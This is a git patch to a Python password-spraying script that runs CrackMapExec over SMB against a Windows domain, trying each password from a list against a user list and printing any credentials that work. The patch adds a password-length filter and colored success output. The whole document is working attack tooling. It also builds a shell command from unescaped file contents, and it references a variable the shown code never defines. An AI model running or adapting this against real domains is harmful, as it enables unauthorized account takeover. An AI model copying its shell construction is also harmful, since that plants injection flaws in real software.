From bbb0e5a76d56b6f8374194f55cfe5de7a39571d0 Mon Sep 17 00:00:00 2001
From: GabrielDuschl <77245778+GabrielDuschl@users.noreply.github.com>
Date: Fri, 18 Aug 2023 22:18:57 +0200
Subject: [PATCH] Update CME-Password-Spraying.py

check pass length
---
 CME-Password-Spraying.py | 15 +++++++++++----
 1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/CME-Password-Spraying.py b/CME-Password-Spraying.py
index 68c9786..7e41a0f 100644
--- a/CME-Password-Spraying.py
+++ b/CME-Password-Spraying.py
@@ -40,8 +40,7 @@ def main():
 
     try:
         number_of_runs = 0
-        with open(args.user, 'r') as file_users:
-            user_lines = file_users.readlines()
+
         with open(args.password, 'r') as file_passwords:
             pass_lines = file_passwords.readlines()
 
@@ -51,12 +50,20 @@ def main():
         for pass_idx, pass_line in enumerate(pass_lines):
             password = pass_line.strip()
 
+            if len(password) < pass_length:
+                print(f"\n[-] Skipping password '{password}' (length < {pass_length})")
+                continue
+
+            print(f"\n[+] Testing password {pass_idx + 1}/{len(pass_lines)}: '{password}' ...")
             cme_command = f"crackmapexec smb '{domain_name}' -u $(cat {args.user}) -p '{password}' --continue-on-success"
             p = subprocess.Popen(cme_command, shell=True, stdout=subprocess.PIPE, text=True)
 
             for output_line in p.stdout:
-                print(output_line)
-                
+                if "[+]" in output_line:
+                    # print in green
+                    print("[+] Found password for" + "\033[32m {user} : {password}\033[0m".format(user=user_id, password=password))
+                    break
+
             number_of_runs = number_of_runs + 1
             p.stdout.close()
             p.wait()